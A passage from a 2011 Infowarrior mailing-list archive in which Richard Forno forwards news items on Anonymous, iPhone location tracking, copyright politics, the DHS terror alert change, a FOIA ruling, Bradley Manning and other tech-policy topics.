at infowarrior.org Tue Apr 19 07:28:11 2011 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 19 Apr 2011 08:28:11 -0400 Subject: [Infowarrior] - Anonymous Silenced By YouTube Message-ID: (won't make a huge difference, imho. --- rick) Anonymous Silenced By YouTube http://torrentfreak.com/anonymous-silenced-by-youtube-110419/ ? enigmax ? 19/04/2011 Trying to keep up with the latest developments from Anonymous is proving a little tricky this month. Since the beginning of the year the group has been releasing videos to spread news and details of forthcoming operations. Many, if not all, Anonymous videos have been uploaded to YouTube but since the start of April the Google-owned site has been censoring them. The last three ? Operation Sony ? April 4, 2011, Operation Sony Update ? April 12, 2011 and Operation Black Out ? April 18, 2011 ? have all been removed on Terms of Service violations. The one we were most interested in was the latter, which contained information on a planned protest against the New Zealand government. They passed a 3 strikes-style law to deal with online file-sharing last week which hasn?t impressed Anonymous. According to information received by TorrentFreak, Anonymous still have some heavy punishment for Sony up their collective sleeves. The anonymous (that?s a small ?a?) tip suggests that a DDoS is coming, but one with a new technical twist, not previously utilized by the group. http://torrentfreak.com/anonymous-silenced-by-youtube-110419/ From rforno at infowarrior.org Tue Apr 19 11:27:53 2011 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 19 Apr 2011 12:27:53 -0400 Subject: [Infowarrior] - Software on the Witness Stand: What Should It Take for Us to Trust It? Message-ID: <32E40C2C-9D50-459F-9CE7-EA198BB52FDC@infowarrior.org> http://www.cs.dartmouth.edu/~sergey/trusting-e-evidence.pdf Software on the Witness Stand: What Should It Take for Us to Trust It? Sergey Bratus1, Ashlyn Lembree2, Anna Shubina1 1 Institute for Security, Technology, and Society, Dartmouth College, Hanover, NH 2 Franklin Pierce Law Center, Concord, NH 1 Motivation We discuss the growing trend of electronic evidence, created automatically by autonomously running software, being used in both civil and criminal court cases. We discuss trustworthiness requirements that we believe should be applied to such software and platforms it runs on. We show that courts tend to regard computer-generated materials as inherently trustworthy evidence, ignoring many software and platform trustworthiness problems well known to computer security researchers. We outline the technical challenges in making evidence-generating software trustworthy and the role Trusted Computing can play in addressing them. This paper is structured as follows: Part I is a case study of electronic evidence in a ?file sharing? copyright infringement case, potential trustworthiness issues involved, and ways we believe they should be addressed with state-of-the-art computing practices. Part II is a legal analysis of issues and practices surrounding the use of software-generated evidence by courts. http://www.cs.dartmouth.edu/~sergey/trusting-e-evidence.pdf From rforno at infowarrior.org Tue Apr 19 13:35:38 2011 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 19 Apr 2011 14:35:38 -0400 Subject: [Infowarrior] - Silly Giant Boarding Pass Message-ID: <6F0EF752-3512-41E9-BAF1-DDF6FD672109@infowarrior.org> (c/o DS) http://bbryson.com/bill/2007/10/12/have-you-ever-printed-a-boarding-pass/ Well this little feat has been a long time coming. For those of you who have worked with me in Unalakleet you probably have heard about my aspiration of using the poster printer to print my boarding pass. Well two days ago my dream became a reality. I logged onto nwa.com and checked in for my flight. Selected my seats and chose the option to print my boarding pass...I was on two different flights and both boarding pass tickets were on the same page stacked on top of each other. This wouldn?t do I need each boarding pass to be on a different print out to really dramatize the ?Big Boarding Pass?. So I took a screen shot of each individual one and then took them over to the poster printer. Each one printed out to be about three feet wide and about 1.5 feet tall.... From rforno at infowarrior.org Tue Apr 19 20:45:43 2011 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 19 Apr 2011 21:45:43 -0400 Subject: [Infowarrior] - New Alzheimer's Guidelines: Will They Help Doctors Spot the Disease Earlier? Message-ID: <4C274840-0BC0-4D0B-81FB-37D1B7CCB279@infowarrior.org> New Alzheimer's Guidelines: Will They Help Doctors Spot the Disease Earlier? By Alice Park Tuesday, April 19, 2011 http://healthland.time.com/2011/04/19/new-alzheimers-guidelines-will-they-help-doctors-spot-the-disease-earlier/print/ For the first time in nearly three decades, experts have created a set of guidelines to better diagnose Alzheimer's disease in the clinic. The advice also helps doctors identify the earliest signs of the degenerative condition, even before symptoms of memory loss begin. The hope is that they can help patients prepare early, and eventually treat, the disease. I first wrote about these guidelines when the Alzheimer's Association and the National Institute on Aging released a draft version in June 2010, so that researchers could review and comment on them. Not much has changed in the final version, but here's a breakdown of how they will be applied. Currently, Alzheimer's disease can be definitively diagnosed only at autopsy, when pathologists can confirm the presence of protein plaques and tangles in the brain of a patient who had shown signs of memory loss and cognitive deficits. The new guidelines tease apart three different stages of the disease that are meant to help doctors better identify affected patients while they are alive. The phases also reflect the latest research, which suggests that Alzheimer's develops in the brain over a long period of time ? perhaps years or even decades before the first cognitive deficits are noticeable. The first stage, known as preclinical Alzheimer's disease, includes those who are on the road to the neurodegenerative decline typical of the condition. These patients have no signs of any problems yet ? they have no difficulty with memory or recall, and remain mentally intact ? but in their brains, the protein amyloid is starting to build up. Scientists are developing ways to detect this subtle accumulation, just as blood tests pick up rising cholesterol levels that can contribute to heart disease, and imaging screens identify the smallest lesions that will become cancerous tumors. The guidelines suggest ways that blood tests sensitive enough to pick up abnormal levels of amyloid, as well as tests of spinal fluid for the protein, might be used at this stage to identify those who might be at greater risk of developing Alzheimer's. The experts creating these guidelines stress that the tests should be used only in research studies at this point, since they have yet to be validated. But doctors need to start studying them, they said, and should learn to familiarize themselves with how they might work. The next phase is called pre-dementia, and encompasses patients who might be showing the first signs of memory lapses, changes in learning or attention, and other deficits in thinking. Otherwise known as mild cognitive impairment (MCI), these symptoms may be noticeable to both the patient and her family and friends, and while obvious, they may not be severe enough yet to cause any problems with daily activities. A subset of those with MCI go on to develop Alzheimer's, and the guidelines specify four levels of the condition that can help doctors distinguish which cases are more likely to progress to Alzheimer's and which are not. Also at this stage, newer techniques such as brain imaging studies are hinting that it may be possible to separate Alzheimer's MCI from other types of dementia, but these are also still in the research stages and not ready for use in diagnosing patients in the clinic. Finally, the guidelines specify the criteria for the third stage, which includes patients with dementia due to Alzheimer's disease; these patients have cognitive deficits that impair a person's ability to function in his daily life. In addition, this stage would include people with genetic mutations linked to the disease, which are responsible for both the early onset condition that runs in families as well as the more common dementia that progresses later in life. Even for patients with dementia, the guidelines suggest the potential use of blood or imaging tests that could further distinguish abnormal deficits associated with Alzheimer's from the more normal mental decline typical of aging. The idea behind the guidelines is to make it easier for non-specialists ? physicians without access to sophisticated brain imaging instruments or the latest assays for blood or spinal fluid tests ? to distinguish the Alzheimer's patient from others suffering from dementia. That way, say experts, these patients could become part of research studies in which newer methods for diagnosing the disease can be tested and validated. Such participants would also be eligible for testing new treatments that might stop or reverse the neurodegenerative disease, and if those prove successful, would help turn the tide on the flood of cases that are expected in the coming years as the baby boom population ages. The guidelines may not make a significant difference in the everyday care of patients today, but they could lay the foundation for a fundamental shift in understanding and treating the disease tomorrow. Find this article at: http://healthland.time.com/2011/04/19/new-alzheimers-guidelines-will-they-help-doctors-spot-the-disease-earlier/ From rforno at infowarrior.org Wed Apr 20 13:43:34 2011 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 20 Apr 2011 14:43:34 -0400 Subject: [Infowarrior] - iPhone keeps record of everywhere you go Message-ID: iPhone keeps record of everywhere you go Privacy fears raised as researchers reveal file on iPhone that stores location coordinates and timestamps of owner's movements ? Charles Arthur ? guardian.co.uk, Wednesday 20 April 2011 14.06 BST http://www.guardian.co.uk/technology/2011/apr/20/iphone-tracking-prompts-privacy-fears Security researchers have discovered that Apple's iPhone keeps track of where you go ? and saves every detail of it to a secret file on the device which is then copied to the owner's computer when the two are synchronised. The file contains the latitude and longitude of the phone's recorded coordinates along with a timestamp, meaning that anyone who stole the phone or the computer could discover details about the owner's movements using a simple program. For some phones, there could be almost a year's worth of data stored, as the recording of data seems to have started with Apple's iOS 4 update to the phone's operating system, released in June 2010. "Apple has made it possible for almost anybody ? a jealous spouse, a private detective ? with access to your phone or computer to get detailed information about where you've been," said Pete Warden, one of the researchers. Only the iPhone records the user's location in this way, say Warden and Alasdair Allan, the data scientists who discovered the file and are presenting their findings at the Where 2.0 conference in San Francisco on Wednesday. "Alasdair has looked for similar tracking code in [Google's] Android phones and couldn't find any," said Warden. "We haven't come across any instances of other phone manufacturers doing this." Simon Davies, director of the pressure group Privacy International, said: "This is a worrying discovery. Location is one of the most sensitive elements in anyone's life ? just think where people go in the evening. The existence of that data creates a real threat to privacy. The absence of notice to users or any control option can only stem from an ignorance about privacy at the design stage." Warden and Allan point out that the file is moved onto new devices when an old one is replaced: "Apple might have new features in mind that require a history of your location, but that's our specualtion. The fact that [the file] is transferred across [to a new iPhone or iPad] when you migrate is evidence that the data-gathering isn't accidental." But they said it does not seem to be transmitted to Apple itself. Map shows location data collected from an iPhone that had been used in the southwest of England Although mobile networks already record phones' locations, it is only available to the police and other recognised organisations following a court order under the Regulation of Investigatory Power Act. Standard phones do not record location data. MPs in 2009 criticised the search engine giant Google for its "Latitude" system, which allowed people to enable their mobile to give out details of their location to trusted contacts. At the time MPs said that Latitude "could substantially endanger user privacy", but Google pointed out that users had to specifically choose to make their data available. The iPhone system, by contrast, appears to record the data whether or not the user agrees. Apple declined to comment on why the file is created or whether it can be disabled. Warden and Allan have set up a web page which answers questions about the file, and created a simple downloadable application to let Apple users check for themselves what location data the phone is retaining. The Guardian has confirmed that 3G-enabled devices including the iPad also retain the data and copy it to the owner's computer. If someone were to steal an iPhone and "jailbreak" it, giving them direct access to the files it contains, they could extract the location database directly. Alternatively, anyone with direct access to a user's computer could run the application and see a visualisation of their movements. Encrypting data on the computer is one way to protect against it, though that still leaves the file on the phone. Graham Cluley, senior technology consultant at the security company Sophos, said: "If the data isn't required for anything, then it shouldn't store the location. And it doesn't need to keep an archive on your machine of where you've been." He suggested that Apple might be hoping that it would yield data for future mobile advertising targeted by location, although he added: "I tend to subscribe to cockup rather than conspiracy on things like this ? I don't think Apple is really trying to monitor where users are." The data inside the file containing the location and time information. This is used to plot the map above The location file came to light when Warden and Allan were looking for a source of mobile data. "We'd been discussing doing a visualisation of mobile data, and while Alasdair was researching into what was available, he discovered this file. At first we weren't sure how much data was there, but after we dug further and visualised the extracted data, it became clear that there was a scary amount of detail on our movements," Warden said. They have blogged about their discovery at O'Reilly's Radar site, noting that "why this data is stored and how Apple intends to use it ? or not ? are important questions that need to be explored." The pair of data scientists have collaborated on a number of data visualisations, including a map of radiation levels in Japan for The Guardian. They are developing a Data Science Toolkit for dealing with location data. Davies said that the discovery of the file indicated that Apple had failed to take users' privacy seriously. Apple can legitimately claim that it has permission to collect the data: near the end of the 15,200-word terms and conditions for its iTunes program, used to synchronise with iPhones, iPods and iPads, is an 86-word paragraph about "location-based services". It says that "Apple and our partners and licensees may collect, use, and share precise location data, including the real-time geographic location of your Apple computer or device. This location data is collected anonymously in a form that does not personally identify you and is used by Apple and our partners and licensees to provide and improve location-based products and services. For example, we may share geographic location with application providers when you opt in to their location services." From rforno at infowarrior.org Wed Apr 20 18:56:08 2011 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 20 Apr 2011 19:56:08 -0400 Subject: [Infowarrior] - =?windows-1252?q?MPAA=3A_=93Democratizing_Culture?= =?windows-1252?q?_Is_Not_In_Our_Interest=94?= Message-ID: <9FA51AB2-771C-451C-9153-21E50C610285@infowarrior.org> MPAA: ?Democratizing Culture Is Not In Our Interest? ? Ernesto ? 20/04/2011 http://torrentfreak.com/mpaa-democratizing-culture-is-not-in-our-interest-110420/ MPAA Vice President Greg Frazier has made some interesting comments on copyright and widespread Internet piracy during a lobbying visit to Brazil. Among other things, Frazier told a local newspaper that democratizing culture is not in the interests of the MPAA. As it turns out, the MPAA?s definition of creativity and culture is a rather narrow one that is quite different from that of the general public. The MPAA sent its Vice President Greg Frazier to Brazil this week to carry out some damage control. Last year the former president of Brazil posed with Pirate Bay founder Peter Sunde and vowed not to cave in to the interests of the copyright lobby. But with the change of leadership the MPAA sees new chances, and so Frazier went to Brazil to convince local politicians that tougher anti-piracy laws are needed. In common with most Latin American countries, piracy is widespread in Brazil. According to a recent study more than half of all people living in urban areas regularly pirate movies, something the MPAA believes has to be stopped. In an interview with local newspaper Folha, Frazier commented on the threat piracy poses to the major studios, responding with the classic textbook answers we?ve heard hundreds of times before. ?If you do not believe in the value of creativity, the importance of protecting it and the need to reward those who produce, then maybe you can justify piracy. But in that case you?ll be doing great harm to culture,? Frazier said. Please note the words ?creativity? and ?culture? in his answer, as we?ll come back to that later. The reporter then went on to ask how important copyright really is when 44% of households in Brazil are not connected to the sewer system. Not really a fair question, but Frazier made it very clear that even when people are starving it would be immoral to ?steal? entertainment from U.S. corporations. ?Obviously, governments and societies have to work to make sure that the population has access to the basics in order to survive, but that does not mean you should ignore other things. Companies must live together because they respect each other and respect that people do not steal from one another. Even if you battle to put food on your plate, it is immoral to steal,? he said. Things got more interesting when Frazier responded in a surprisingly open manner when asked about Creative Commons licenses, which allow for a more flexible approach to copyright. Creative Commons licenses are very popular in Brazil and the reporter wanted to know what the MPAA?s view on this approach is. ?They [Creative Commons supporters] don?t always agree with what we advocate,? Frazier responded. ?And you are talking about democratizing culture, this is not in our interests. It really isn?t my interest.? Although this answer may not really come as a surprise, combined with his previous answers it shows how subjective the MPAA?s view on creativity and culture is. According to the MPAA piracy is ruining culture, but at the same time they are not allowing others to use even tiny snippets of their works. The MPAA is apparently only interested in creativity and culture when it applies to the works their studios produce. Needless to say, this isn?t necessarily what?s most beneficial to society. The MPAA is merely protecting their corporate interests. For the general public, culture and creativity are probably better off with less restrictive copyright laws. This doesn?t mean that it should be okay to pirate every Hollywood blockbuster, but the laws that are put in place to please the movie studios are the same ones that cripple the creativity of tens of thousands of other artists and the public at large. To the MPAA and many others in the entertainment industry, copyright has little to do with the word right, nor with creativity and culture. Instead, it?s a restrictive tool that allows works to be traded, leased and licensed in return for money. Indeed, democratizing culture is not in the MPAA?s interest, but maximizing profits and control is. From rforno at infowarrior.org Wed Apr 20 20:33:02 2011 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 20 Apr 2011 21:33:02 -0400 Subject: [Infowarrior] - DHS announces new terror alert system Message-ID: DHS announces new terror alert system By Keith Laing - 04/20/11 09:35 AM ET http://thehill.com/blogs/transportation-report/aviation/156967-napolitano-announces-new-terror-alert-system Homeland Security Secretary Janet Napolitano announced the end of color-coded terror alert system that has marked U.S. airports since 9/11, replacing it with what she calls a more specific system that will address targeted threats. Under the new system, there will only be two categories when alerts are necessary: "elevated threat" and "imminent threat." Alerts will be issue to specific areas of concerns, not nationwide. They will also be delivered via traditional and social media. Napolitano said the terror threat has changed over since 9/11, so it was time for the alert system to change, too. ?The terrorist threat facing our country has evolved significantly over the past 10 years, and in today?s environment ? more than ever ? we know that the best security strategy is one that counts on the American public as a key partner in securing our country,? she said in a statement announcing the decision. ?The National Terrorism Advisory System, which was developed in close collaboration with our federal, state, local, tribal and private sector partners, will provide the American public with information about credible threats so that they can better protect themselves, their families, and their communities,? Napolitano said. Napolitano did a round of television interviews Wednesday morning to talk up the new system. On NBC's "Today Show," she said the old color system was no longer effective because it confused passengers. "We've been orange since 2006," she said. "What we are changing is to a system that actually gives people specificity, tells them what to do, what to prepare, what to look for and how to get more information." "It would sunset in two weeks, so we get out of this business of cascading alerts," Napolitano added. Napolitano said the new alert system will take effect April 26. The homeland security secretary made the announcement a day after reports surfaced that an error by an air traffic controller forced a plane carrying first lady Michelle Obama and Vice President Joe Biden's wife Jill to abort its landing because a military plane had not cleared the runaway yet. Napolitano said the incident involving the first and second ladies did not show that the national aviation was vulnerable to another terrorist attack. "Not in that sense from a terrorism exploitation thing," she said. "I think it's more of a concern about day-to-day aviation safety. Air traffic controllers are key to the safety of the aviation system overall." She also praised the administration's response to that incident and to the rash or reports of air traffic controllers sleeping on the job. "I think (Transportation) Secretary LaHood and the FAA are really looking internally about what they need to do, change process, procedures, training, staffing, all the things that go into making sure the air traffic control system remains safe," Napolitano said. From rforno at infowarrior.org Thu Apr 21 07:45:14 2011 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 21 Apr 2011 08:45:14 -0400 Subject: [Infowarrior] - more on ... iPhone tracking References: <201104211240.p3LCeMVe010258@synergy.ecn.purdue.edu> Message-ID: <0D22C928-48B4-4069-BE54-57E32B825A44@infowarrior.org> Begin forwarded message: > From: Joe C > > Hi Richard, > > Don't know if you have seen this one. > > Here's a video of Warden/Allan explaining of it all. Looks like its also > tracking wireless APs and magnetic field strenghts. > > http://ibnlive.in.com/news/your-iphone-is-secretly-tracking-you/149784-11.html?f > rom=hp > From rforno at infowarrior.org Thu Apr 21 07:54:46 2011 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 21 Apr 2011 08:54:46 -0400 Subject: [Infowarrior] - Inaugural Maryland Cyber Challenge & Conference (MDC3) Now Enrolling Teams Message-ID: <0A7830CB-0DDC-4F1C-8C4E-7834C69BC145@infowarrior.org> (Disclosure: I am co-chair of the Steering Committee. --- rick) Inaugural Maryland Cyber Challenge & Conference (MDC3) Now Enrolling Teams Posted April 20, 2011 http://www.umbc.edu/blogs/umbcnews/2011/04/inaugural_maryland_cyber_chall_1.html Baltimore -- Organizers of the Maryland Cyber Challenge & Conference (MDC3) announced today that registration is now open for high school students, college students and cybersecurity professionals who wish to compete for scholarships and prizes in this inaugural event to be held October 21-22 at the Baltimore Convention Center. The competition is seeking teams of up to six players who will compete in three divisions of competition: high school, college or university, and professional. The competition is open to any student enrolled in a Maryland high school, college or university, or any professional employed by a company or government agency with an office in Maryland. (http://www.mdc3.org/) Potential competitors only need a basic knowledge of Windows and UNIX to participate, and will have the opportunity to learn how the challenge games will be played during an orientation session. The first of three orientation sessions for competitors will be held May 2 at UMBC in the main seminar room of the Incubator and Accelerator building, bwtech at UMBC South (1450 South Rolling Road, Baltimore, MD 21227). Orientation for professionals will be held from 4:30 p.m. - 5:30 p.m., and for high school and college students from 6 p.m. - 7 p.m. Anyone interested in registering a team for the competition should attend an orientation session; those who cannot attend in person will be able to access the session online. Additional orientation sessions will be held May 18 and June 21. Once teams register, they will be able to participate in practice competitions throughout the summer to prepare for the MDC3 qualifying rounds to be held in September. Full competition details and registration information are available on both the MDC3 website (www.MDC3.org) and Facebook page (search "Maryland Cyber Challenge"). By participating in MDC3, competitors will have the opportunity to learn and develop skills and techniques needed to protect vital information systems while participating in a fun, competitive, team-based activity. Throughout the challenge, high school teams will practice basic cyber defense techniques, while university and professional teams will use more advanced forensic techniques and employ both offensive and defensive strategies in a head-to-head "capture the flag" challenge. Beginning in September, two qualifying rounds will be held online using SAIC's Cyber Network Exercise System (CyberNEXS), a scalable training, exercise and certification system. The second qualifying round will determine the final eight teams from each division - high school, college and university, and professional - that will go on to compete in person at the October conference. Winners of each division will receive their trophies and awards at a formal ceremony to be held at UMBC in November. MDC3 was designed by Science Applications International Corporation (SAIC) [NYSE: SAI] and the University of Maryland, Baltimore County (UMBC), in partnership with the Department of Business & Economic Development (DBED), the Tech Council of Maryland (TCM) and the National Cyber Security Alliance (NCSA) to encourage more students and young professionals to pursue careers in cybersecurity. The event will further DBED and Governor Martin O'Malley's "Cyber Maryland" initiative to position Maryland as the nation's epicenter of cybersecurity and innovation. Throughout the conference, students and young professionals will have the opportunity to network with cybersecurity leaders and recruiters while learning about careers in cyber technology. About the Maryland Cyber Challenge & Conference (MDC3) The inaugural Maryland Cyber Challenge & Conference (MDC3) will be held October 21-22 at the Baltimore Convention Center. The event will give teams of high school students, college and university students, and professionals the opportunity to learn about cybersecurity and develop practical skills for defending computers while competing for scholarships and prizes in a fun environment. The conference will feature keynote speakers, breakout sessions and vendor booths for an audience of students, parents and professionals from academia, industry and government. Sponsorship and exhibitor opportunities are both available. MDC3 was created by Science Applications International Corporation (SAIC) [NYSE: SAI] and the University of Maryland, Baltimore County (UMBC) in partnership with the Department of Business & Economic Development (DBED), the Tech Council of Maryland (TCM) and the National Cyber Security Alliance (NCSA) with the goal of encouraging Maryland students and young professionals to pursue education and careers in cybersecurity. MDC3 supports the State of Maryland's initiative to become the nation's epicenter for innovation in cybersecurity. For more information, please visit www.MDC3.org. From rforno at infowarrior.org Fri Apr 22 09:47:58 2011 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 22 Apr 2011 10:47:58 -0400 Subject: [Infowarrior] - Feds reactivate siezed poker sites temporarily Message-ID: <2F067338-CB52-4796-9AFB-964A3CDDE323@infowarrior.org> Feds Plan To Temporarily Turn Poker Sites Back On So People Can Get Their Money Out from the didn't-want-a-poker-player-revolt dept When the feds seized three poker domains, one of the big concerns was if players would be able to get back their money. When the initial questions were raised, the Justice Department made some statements about how they didn't want people to be able to claim money that was obtained through illegal means -- suggesting that players would not be able to get their money back. However, it appears that someone let those in power know that there are a lot of people who play online poker... and they vote. So, suddenly, the government has agreed to reactivate two of the seized domains to help players retrieve their money. They're spinning the story to suggest people have "always" been able to reclaim their money, but many players say that was not the case at all, and they were completely frozen out of their accounts. http://www.techdirt.com/articles/20110421/15055113990/feds-plan-to-temporarily-turn-poker-sites-back-so-people-can-get-their-money-out.shtml From rforno at infowarrior.org Fri Apr 22 14:46:35 2011 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 22 Apr 2011 15:46:35 -0400 Subject: [Infowarrior] - =?windows-1252?q?Court_Rejects_Agency=92s_Nationa?= =?windows-1252?q?l_Security_Claim?= Message-ID: <516FFB11-7653-4B56-B8E0-688F902C0A54@infowarrior.org> Court Rejects Agency?s National Security Claim http://www.fas.org/blog/secrecy/?p=5143 In Freedom of Information Act litigation, courts will almost always defer to a government agency when it asserts that national security requires that certain information remain classified. Judges say they are reluctant to ?second guess? agency national security experts, and there is a substantial body of case law that discourages them from doing so. But earlier this month, Judge Richard W. Roberts of the DC District Court considered an agency?s national security claim, found it unpersuasive, and rejected it (pdf). In that FOIA case, Center for International Environmental Law vs. the Office of the United States Trade Representative, the plaintiff sought a USTR document concerning the U.S. negotiating position on the Free Trade Agreement of the Americas. USTR said the document was classified because the international negotiations were confidential and the document?s disclosure would result in damage to U.S. foreign relations. ?USTR argues that release of document 1 would constitute a breach of its agreement with the other nations participating in the FTAA negotiations. [USTR] states that [t]here is an understanding among the 34 participating governments, consistent with longstanding practice in multiparty trade negotiations, that they will not release to the public any negotiating documents they produce or receive in confidence in the course of the negotiations unless there is a consensus among the 34 governments to do so.? But remarkably, the judge didn?t buy it, particularly since it was a question of releasing a U.S. document, not a foreign document. USTR ?has not shown it likely that disclosing document 1 would discourage foreign officials from providing information to the United States in the future because those officials would have no basis for concluding that the United States would dishonor its commitments to keep foreign information confidential,? he concluded. ?Although a court must defer to agency affidavits predicting harm to the national security, ?[d]eference? does not mean acquiescence?,? Judge Roberts wrote. See the April 12, 2011 Memorandum Opinion here. The ruling that international negotiations cannot necessarily be used as a pretext for classifying U.S. government information may have important ramifications in other policy areas. So, for example, the U.S. government currently makes less information about the makeup of the U.S. nuclear arsenal under the New START Treaty than it previously did under the START regime, observed Hans Kristensen of FAS last month. Although such stockpile information is generated and is regularly exchanged with the government of Russia under the provisions of New START, it is currently classified and has still not been made publicly available. If it became necessary to challenge the classification of this information in court, then Judge Robert?s new ruling might offer an apt precedent. ?Although the Constitution permits the judiciary to play a role in judging government secrecy claims and Congress has repeatedly endorsed that role, most prominently in the Freedom of Information Act, judges have been reluctant to question Executive Branch secrecy,? observed Meredith Fuchs in a 2006 law review article that argued for a more active judicial role in reviewing classification decisions. ?Without judicial intervention?, the incentives on the Executive Branch to overreach far outweigh any checks on excessive secrecy.? From rforno at infowarrior.org Fri Apr 22 14:49:35 2011 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 22 Apr 2011 15:49:35 -0400 Subject: [Infowarrior] - AT&T Admits Network Can't Handle iPhone, iPad Message-ID: <7F47886B-34D0-48DC-9DAC-4233B6F64C3D@infowarrior.org> Friday, April 22, 2011 10:06 AM EDT AT&T Admits Network Can't Handle iPhone, iPad By Ricardo Bilton http://www.ibtimes.com/articles/137269/20110422/at-t-admits-network-can-t-handle-iphone-ipad.htm AT&T has admitted that the rise of tablet and smartphones like the iPad and iPhone has taken a major toll on its network. In its public filing to the Federal Communications Commission yesterday, the company admits that its network has been under increasing strain as more and more high-bandwidth devices have been connected. This not only includes smartphones like the iPhone, but tablets like the iPad as well. AT&T says that in many cases tablets put a greater stress on their network than smartphones do. AT&T traces its network troubles back to around 2007, and though the filing does not mention the iPhone by name, the company's 8,000% increase in data consumption from 2007 to 2010 correspond s with the launch of the first iPhone in 2008. Smartphones, AT&T says, use 24 times more data for each user, and that doesn't even include tablet usage. The company doesn't see the traffic troubles letting up. "Over the next five years, data usage on AT&T's network is projected to skyrocket as customers 'mobilize' all of their communications activities, from streaming HD video and cloud computing to a range of M2M applications like energy management, fleet tracking, and remote health monitoring," AT&T writes in the filing. AT&T says the overloading of its network justifies its acquisition of T-Mobile. Customers will benefit from faster data and a reduced frequency of dropped calls. The company also says that the acquisition would increase broadband penetration to rural areas of the United States, a significant goal of the Obama administration. From rforno at infowarrior.org Fri Apr 22 14:51:59 2011 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 22 Apr 2011 15:51:59 -0400 Subject: [Infowarrior] - Who's Funding More Terrorism: Downloaders Or Hollywood? Message-ID: <05565911-5301-4820-9140-10EC91A9EFFE@infowarrior.org> Who's Funding More Terrorism: Downloaders Or Hollywood? from the questions-to-ask dept We've written a few times now about the absolutely brilliant SSRC report on media "piracy," and how it's basically a business model problem, rather than a legal one. The report is thorough, detailed and rather complete on a variety of topics related to this issue. And while we might hope that such a fantastic piece of scholarly research could take certain silly arguments off the table, apparently that's wishful thinking. The main guy behind the report, Joe Karaganis, has recently posted some blog posts on the whole "terrorism" issue. You see, it's quite common for people pushing for greater copyright enforcement to make the claim that infringement funds terrorism and organized crime. We've attempted to debunk some of those claims in the past, but the SSRC folks did an amazingly thorough debunking (pdf) of the whole thing. Basically, it argues that, pre-internet, there was likely a connection between counterfeiting CDs/DVDs and organized crime, but that business has pretty much dried up thanks to the internet. So the claims of infringement funding such things is really lacking. A snippet: < -- > http://www.techdirt.com/articles/20110421/00493313981/whos-funding-more-terrorism-downloaders-hollywood.shtml From rforno at infowarrior.org Sat Apr 23 10:23:56 2011 From: rforno at infowarrior.org (Richard Forno) Date: Sat, 23 Apr 2011 11:23:56 -0400 Subject: [Infowarrior] - more on ... iPhone keeps record of everywhere you go References: <006c01cc01bc$18b9c910$4a2d5b30$@alleghenydigital.com> Message-ID: <629AF5F3-F6D4-4EFA-AFC5-7C3C4836050D@infowarrior.org> Begin forwarded message: > From: "Greg" > Subject: RE: [Infowarrior] - iPhone keeps record of everywhere you go > > And now...an open source tool to visualize your iPhone travels: > http://petewarden.github.com/iPhoneTracker/ One of several available (or soon to be) I am sure. --- rick From rforno at infowarrior.org Sat Apr 23 10:55:13 2011 From: rforno at infowarrior.org (Richard Forno) Date: Sat, 23 Apr 2011 11:55:13 -0400 Subject: [Infowarrior] - Are your users S.T.U.P.I.D? Message-ID: <0ECA2BDB-10FA-4893-BAD1-9DDB711439BA@infowarrior.org> Are your users S.T.U.P.I.D? How good design can make users effective by Stephen Turbek on 2011/04/20 It is an honest question: how smart are your users? The answer may surprise you: it doesn?t matter. They can be geniuses or morons, but if you don?t engage their intelligence, you can?t depend on their brain power. Far more important than their IQ (which is a questionable measure in any case) is their Effective Intelligence: the fraction of their intelligence they can (or are motivated to) apply to a task. Take, for example, a good driver. They are a worse driver when texting or when drunk. (We don?t want to think about the drunk driver who is texting.) An extreme example you say? Perhaps, but only by degree. A person who wins a game of Scrabble one evening may be late for work because they forgot to set their alarm clock. How could the same person make such a dumb mistake? Call it concentration, or focus, we use more of our brain when engaged and need support when we are distracted. So, what does a S.T.U.P.I.D. user look like? < -- > http://www.boxesandarrows.com/view/are-your-users-s-t-u From rforno at infowarrior.org Sun Apr 24 09:39:53 2011 From: rforno at infowarrior.org (Richard Forno) Date: Sun, 24 Apr 2011 10:39:53 -0400 Subject: [Infowarrior] - Obama Says It's Okay To Treat Manning The Way He's Been Treated Because He 'Broke The Law' Message-ID: Obama Says It's Okay To Treat Manning The Way He's Been Treated Because He 'Broke The Law' from the missing-the-point dept In the continuing saga of President Obama's tone deafness to the concerns of many (including the UN) around the world regarding the treatment of Bradley Manning -- who's accused of being the source of many of Wikileaks major releases -- the President responded to some protesters in San Francisco by defending the treatment of Manning: OBAMA: So people can have philosophical views [about Bradley Manning] but I can't conduct diplomacy on an open source [basis]... That's not how the world works. And if you're in the military... And I have to abide by certain rules of classified information. If I were to release material I weren't allowed to, I'd be breaking the law. We're a nation of laws! We don't let individuals make their own decisions about how the laws operate. He broke the law. [Q: Didn't he release evidence of war crimes?] OBAMA: What he did was he dumped... [Q: Isn't that just the same thing as what Daniel Ellsberg did?] OBAMA: No it wasn't the same thing. Ellsberg?s material wasn't classified in the same way. Now, the folks who posted this are taking the biggest issue with Obama's statement of "he broke the law," pointing out that he hasn't been convicted of breaking any laws. I actually don't find that to be all that problematic. The government has charged him with breaking the law, so clearly it believes he has broken the law. Obama stating the same thing that his own Defense Department has stated doesn't seem that ridiculous. But, that still doesn't excuse the treatment of Manning in any way, shape or form. I don't know for certain if he broke the law. But even if he did, he deserves to have a trial on the matter, and prior to that trial he shouldn't be held in conditions that much of the world considers to be torture. That's the key issue, and one not dealt with here. Separately, some of Obama's other remarks are troubling as well. The claim that he "can't" conduct diplomacy if information is open is false. It may be more difficult and he may not like it, but he's not in this job because it's easy. Finally, as the report also notes, while Obama is technically correct that the material Ellsberg released "wasn't classified the same way," he appears to be missing out on how that actually goes in favor of Manning, since the content Manning is charged with leaking was classified at a lower level than what Ellsberg released ("classified" rather than the Pentagon Papers' "top secret"). < -- > http://www.techdirt.com/articles/20110422/11513814002/obama-says-its-okay-to-treat-manning-way-hes-been-treated-because-he-broke-law.shtml From rforno at infowarrior.org Sun Apr 24 11:58:27 2011 From: rforno at infowarrior.org (Richard Forno) Date: Sun, 24 Apr 